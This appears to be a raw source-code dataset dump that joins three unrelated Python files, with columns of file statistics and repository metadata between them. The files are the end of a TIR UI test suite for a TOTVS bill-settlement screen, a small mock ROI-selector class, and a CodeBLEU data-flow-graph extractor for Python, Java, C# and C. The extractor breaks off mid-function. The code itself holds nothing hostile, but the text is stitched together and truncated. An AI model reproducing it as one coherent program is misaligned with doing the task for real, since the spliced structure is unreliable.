self.oHelper.SetButton("Salvar")
self.oHelper.CheckResult("nValRec", "4.385,00", name_attr=True)
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.AssertTrue()
### CT302
### TIR -
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT302(self):
prefixo = "FIN"
titulo = "FIN070MTN"
parcela = " "
tipo = "NF "
banco = "FIN"
agencia = "FIN70"
conta = "FIN70405"
data = "28/12/2020"
lote ='RR415'
ntitulos = '1'
natureza = '001'
#self.oHelper.AddParameter("MV_MULNATR", "", ".T.", ".T.", ".T.")
#self.oHelper.SetParameters()
self.oHelper.WaitShow("Baixa de Titulos")
self.oHelper.SetKey("F12")
self.oHelper.SetValue("Contabiliza On Line ?" ,"Sim")
self.oHelper.SetValue("Considera Retencäo Bancaria ?" ,"Nao")
self.oHelper.SetButton('Ok')
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Lote")
self.oHelper.SetValue("cBancolt", banco, name_attr=True)
self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
self.oHelper.SetValue("cContalt", conta, name_attr=True)
self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
self.oHelper.SetValue("dVencDe", data, name_attr=True)
self.oHelper.SetValue("dVencAte", data, name_attr=True)
self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Salvar")
#self.oHelper.ClickBox("Filial", select_all=True)
self.oHelper.ClickBox("Filial", select_all=False, grid_number=1)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckResult("nValRec", "3.000,00", name_attr=True)
self.oHelper.SetValue("cMotBx", "COMP CARTE", name_attr=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckHelp(text='FA070MOTIN',button='Fechar')
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
self.oHelper.SetValue("", True) #Rateio multiplas naturezas
self.oHelper.SetButton("Salvar")
self.oHelper.SetValue("Natureza", "001", grid=True, row=1)
self.oHelper.SetValue("Vlr.Movim.", "3000,00", grid=True, row=1)
self.oHelper.SetValue("Rat. C.Custo", "1 - Sim", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Outras Ações", "Rateio")
self.oHelper.SetValue("cCodRateio", "001", name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Salvar")
self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.AssertTrue()
### CT303
### TIR -
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT303(self):
prefixo = "FIN"
titulo = "FIN070CHQ"
parcela = " "
tipo = "NF "
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.CheckResult("nValRec", "5.000,00", name_attr=True)
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
self.oHelper.SetButton("Outras Ações", "Cheque(s)")
self.oHelper.SetValue("Valor ref. baixa", "2000,00", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetKey("DELETE", grid=True, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.SetKey("DELETE", grid=True, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.SetKey("DELETE", grid=True, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Salvar")
self.oHelper.SetValue("- Descontos", "10.000,00")
self.oHelper.SetValue("- Descontos", "10,00")
self.oHelper.SetButton("Ok")
self.oHelper.CheckResult("nValRec", "4.990,00", name_attr=True)
self.oHelper.SetButton("Cancelar")
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == "__main__":
unittest.main()
| 34.202048
| 104
| 0.69624
| 4,701
| 36,733
| 5.398851
| 0.092534
| 0.244011
| 0.137746
| 0.054846
| 0.85725
| 0.823404
| 0.782033
| 0.752561
| 0.721671
| 0.699251
| 0
| 0.053274
| 0.127705
| 36,733
| 1,074
| 105
| 34.202048
| 0.738812
| 0.140201
| 0
| 0.699329
| 0
| 0
| 0.245637
| 0.03289
| 0
| 0
| 0
| 0
| 0.032215
| 1
| 0.034899
| false
| 0
| 0.005369
| 0
| 0.041611
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f232d933cad56e4cb53662da8a1ae7d8d616450
| 225
|
py
|
Python
|
radiomicsfeatureextractionpipeline/backend/test/mock_ups/logic/roi_selector/manual_roi_selector.py
|
Maastro-CDS-Imaging-Group/SQLite4Radiomics
|
e3a7afc181eec0fe04c18da00edc3772064e6758
|
[
"Apache-2.0"
] | null | null | null |
radiomicsfeatureextractionpipeline/backend/test/mock_ups/logic/roi_selector/manual_roi_selector.py
|
Maastro-CDS-Imaging-Group/SQLite4Radiomics
|
e3a7afc181eec0fe04c18da00edc3772064e6758
|
[
"Apache-2.0"
] | 6
|
2021-06-09T19:39:27.000Z
|
2021-09-30T16:41:40.000Z
|
radiomicsfeatureextractionpipeline/backend/test/mock_ups/logic/roi_selector/manual_roi_selector.py
|
Maastro-CDS-Imaging-Group/SQLite4Radiomics
|
e3a7afc181eec0fe04c18da00edc3772064e6758
|
[
"Apache-2.0"
] | null | null | null |
from logic.roi_selector.manual_roi_selector import ManualROISelector
from test.mock_ups.logic.roi_selector.roi_selector import ROISelectorMockUp
class ManualROISelectorMockUp(ManualROISelector, ROISelectorMockUp):
pass
| 32.142857
| 75
| 0.875556
| 25
| 225
| 7.64
| 0.56
| 0.230366
| 0.167539
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 225
| 6
| 76
| 37.5
| 0.922705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
9f7d0e540574b334c2e040710055ace42c7511a7
| 61,951
|
py
|
Python
|
Code-Code/code-to-code-trans/evaluator/CodeBLEU/parser/DFG.py
|
snsnlou/CodeXGLUE
|
80ff689671574e5aac0a5560b530ac0fd9c08ca4
|
[
"CC0-1.0",
"MIT"
] | null | null | null |
Code-Code/code-to-code-trans/evaluator/CodeBLEU/parser/DFG.py
|
snsnlou/CodeXGLUE
|
80ff689671574e5aac0a5560b530ac0fd9c08ca4
|
[
"CC0-1.0",
"MIT"
] | null | null | null |
Code-Code/code-to-code-trans/evaluator/CodeBLEU/parser/DFG.py
|
snsnlou/CodeXGLUE
|
80ff689671574e5aac0a5560b530ac0fd9c08ca4
|
[
"CC0-1.0",
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from tree_sitter import Language, Parser
from .utils import (remove_comments_and_docstrings,
tree_to_token_index,
index_to_code_token,
tree_to_variable_index)
def DFG_python(root_node,index_to_code,states):
assignment=['assignment','augmented_assignment','for_in_clause']
if_statement=['if_statement']
for_statement=['for_statement']
while_statement=['while_statement']
do_first_statement=['for_in_clause']
def_statement=['default_parameter']
states=states.copy()
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in def_statement:
name=root_node.child_by_field_name('name')
value=root_node.child_by_field_name('value')
DFG=[]
if value is None:
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
else:
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_python(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
if root_node.type=='for_in_clause':
right_nodes=[root_node.children[-1]]
left_nodes=[root_node.child_by_field_name('left')]
else:
if root_node.child_by_field_name('right') is None:
return [],states
left_nodes=[x for x in root_node.child_by_field_name('left').children if x.type!=',']
right_nodes=[x for x in root_node.child_by_field_name('right').children if x.type!=',']
if len(right_nodes)!=len(left_nodes):
left_nodes=[root_node.child_by_field_name('left')]
right_nodes=[root_node.child_by_field_name('right')]
if len(left_nodes)==0:
left_nodes=[root_node.child_by_field_name('left')]
if len(right_nodes)==0:
right_nodes=[root_node.child_by_field_name('right')]
DFG=[]
for node in right_nodes:
temp,states=DFG_python(node,index_to_code,states)
DFG+=temp
for left_node,right_node in zip(left_nodes,right_nodes):
left_tokens_index=tree_to_variable_index(left_node,index_to_code)
right_tokens_index=tree_to_variable_index(right_node,index_to_code)
temp=[]
for token1_index in left_tokens_index:
idx1,code1=index_to_code[token1_index]
temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
[index_to_code[x][0] for x in right_tokens_index]))
states[code1]=[idx1]
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in ['elif_clause','else_clause']:
temp,current_states=DFG_python(child,index_to_code,current_states)
DFG+=temp
else:
temp,new_states=DFG_python(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
if tag is False:
others_states.append(states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for i in range(2):
right_nodes=[x for x in root_node.child_by_field_name('right').children if x.type!=',']
left_nodes=[x for x in root_node.child_by_field_name('left').children if x.type!=',']
if len(right_nodes)!=len(left_nodes):
left_nodes=[root_node.child_by_field_name('left')]
right_nodes=[root_node.child_by_field_name('right')]
if len(left_nodes)==0:
left_nodes=[root_node.child_by_field_name('left')]
if len(right_nodes)==0:
right_nodes=[root_node.child_by_field_name('right')]
for node in right_nodes:
temp,states=DFG_python(node,index_to_code,states)
DFG+=temp
for left_node,right_node in zip(left_nodes,right_nodes):
left_tokens_index=tree_to_variable_index(left_node,index_to_code)
right_tokens_index=tree_to_variable_index(right_node,index_to_code)
temp=[]
for token1_index in left_tokens_index:
idx1,code1=index_to_code[token1_index]
temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
[index_to_code[x][0] for x in right_tokens_index]))
states[code1]=[idx1]
DFG+=temp
if root_node.children[-1].type=="block":
temp,states=DFG_python(root_node.children[-1],index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in while_statement:
DFG=[]
for i in range(2):
for child in root_node.children:
temp,states=DFG_python(child,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_python(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_python(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
def DFG_java(root_node,index_to_code,states):
assignment=['assignment_expression']
def_statement=['variable_declarator']
increment_statement=['update_expression']
if_statement=['if_statement','else']
for_statement=['for_statement']
enhanced_for_statement=['enhanced_for_statement']
while_statement=['while_statement']
do_first_statement=[]
states=states.copy()
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in def_statement:
name=root_node.child_by_field_name('name')
value=root_node.child_by_field_name('value')
DFG=[]
if value is None:
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
else:
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_java(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
left_nodes=root_node.child_by_field_name('left')
right_nodes=root_node.child_by_field_name('right')
DFG=[]
temp,states=DFG_java(right_nodes,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(left_nodes,index_to_code)
value_indexs=tree_to_variable_index(right_nodes,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in increment_statement:
DFG=[]
indexs=tree_to_variable_index(root_node,index_to_code)
for index1 in indexs:
idx1,code1=index_to_code[index1]
for index2 in indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
flag=False
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in if_statement and flag is False:
temp,current_states=DFG_java(child,index_to_code,current_states)
DFG+=temp
else:
flag=True
temp,new_states=DFG_java(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
if tag is False:
others_states.append(states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for child in root_node.children:
temp,states=DFG_java(child,index_to_code,states)
DFG+=temp
flag=False
for child in root_node.children:
if flag:
temp,states=DFG_java(child,index_to_code,states)
DFG+=temp
elif child.type=="local_variable_declaration":
flag=True
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in enhanced_for_statement:
name=root_node.child_by_field_name('name')
value=root_node.child_by_field_name('value')
body=root_node.child_by_field_name('body')
DFG=[]
for i in range(2):
temp,states=DFG_java(value,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
temp,states=DFG_java(body,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in while_statement:
DFG=[]
for i in range(2):
for child in root_node.children:
temp,states=DFG_java(child,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_java(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_java(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
def DFG_csharp(root_node,index_to_code,states):
assignment=['assignment_expression']
def_statement=['variable_declarator']
increment_statement=['postfix_unary_expression']
if_statement=['if_statement','else']
for_statement=['for_statement']
enhanced_for_statement=['for_each_statement']
while_statement=['while_statement']
do_first_statement=[]
states=states.copy()
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in def_statement:
if len(root_node.children)==2:
name=root_node.children[0]
value=root_node.children[1]
else:
name=root_node.children[0]
value=None
DFG=[]
if value is None:
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
else:
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_csharp(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
left_nodes=root_node.child_by_field_name('left')
right_nodes=root_node.child_by_field_name('right')
DFG=[]
temp,states=DFG_csharp(right_nodes,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(left_nodes,index_to_code)
value_indexs=tree_to_variable_index(right_nodes,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in increment_statement:
DFG=[]
indexs=tree_to_variable_index(root_node,index_to_code)
for index1 in indexs:
idx1,code1=index_to_code[index1]
for index2 in indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
flag=False
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in if_statement and flag is False:
temp,current_states=DFG_csharp(child,index_to_code,current_states)
DFG+=temp
else:
flag=True
temp,new_states=DFG_csharp(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
if tag is False:
others_states.append(states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for child in root_node.children:
temp,states=DFG_csharp(child,index_to_code,states)
DFG+=temp
flag=False
for child in root_node.children:
if flag:
temp,states=DFG_csharp(child,index_to_code,states)
DFG+=temp
elif child.type=="local_variable_declaration":
flag=True
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in enhanced_for_statement:
name=root_node.child_by_field_name('left')
value=root_node.child_by_field_name('right')
body=root_node.child_by_field_name('body')
DFG=[]
for i in range(2):
temp,states=DFG_csharp(value,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
temp,states=DFG_csharp(body,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in while_statement:
DFG=[]
for i in range(2):
for child in root_node.children:
temp,states=DFG_csharp(child,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_csharp(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_csharp(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
def get_identifier_node(root_node):
if root_node.type == 'identifier':
return root_node
return get_identifier_node(root_node.child_by_field_name('declarator'))
def DFG_c(root_node,index_to_code,states):
assignment=['assignment_expression']
def_statement=['init_declarator']
increment_statement=['update_expression']
if_statement=['if_statement','else']
for_statement=['for_statement']
# enhanced_for_statement=['enhanced_for_statement']
while_statement=['while_statement']
do_first_statement=[]
declaration = ['declaration']
other_declarator=['pointer_declarator','function_declarator', 'array_declarator', 'parenthesized_declarator']
states=states.copy()
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in declaration:
first_declarator = root_node.child_by_field_name('declarator')
first_declarator_met = False
DFG=[]
for child in root_node.children:
if child == first_declarator:
first_declarator_met = True
if not first_declarator_met:
continue
if child.type in def_statement:
name=get_identifier_node(child.child_by_field_name('declarator'))
value=child.child_by_field_name('value')
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_c(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
elif child.type in other_declarator or child.type == 'identifier':
name=get_identifier_node(child)
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
# elif root_node.type in def_statement:
# name=root_node.child_by_field_name('declarator')
# value=root_node.child_by_field_name('value')
# DFG=[]
# if value is None:
# indexs=tree_to_variable_index(name,index_to_code)
# for index in indexs:
# idx,code=index_to_code[index]
# DFG.append((code,idx,'comesFrom',[],[]))
# states[code]=[idx]
# return sorted(DFG,key=lambda x:x[1]),states
# name_indexs=tree_to_variable_index(name,index_to_code)
# value_indexs=tree_to_variable_index(value,index_to_code)
# temp,states=DFG_c(value,index_to_code,states)
# DFG+=temp
# for index1 in name_indexs:
# idx1,code1=index_to_code[index1]
# for index2 in value_indexs:
# idx2,code2=index_to_code[index2]
# DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
# states[code1]=[idx1]
# return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
left_nodes=root_node.child_by_field_name('left')
right_nodes=root_node.child_by_field_name('right')
DFG=[]
temp,states=DFG_c(right_nodes,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(left_nodes,index_to_code)
value_indexs=tree_to_variable_index(right_nodes,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in increment_statement:
DFG=[]
indexs=tree_to_variable_index(root_node,index_to_code)
for index1 in indexs:
idx1,code1=index_to_code[index1]
for index2 in indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
flag=False
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in if_statement and flag is False:
temp,current_states=DFG_c(child,index_to_code,current_states)
DFG+=temp
else:
flag=True
temp,new_states=DFG_c(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
if tag is False:
others_states.append(states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for child in root_node.children:
temp,states=DFG_c(child,index_to_code,states)
DFG+=temp
flag=False
for child in root_node.children:
if flag:
temp,states=DFG_c(child,index_to_code,states)
DFG+=temp
elif child.type=="declaration":
flag=True
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
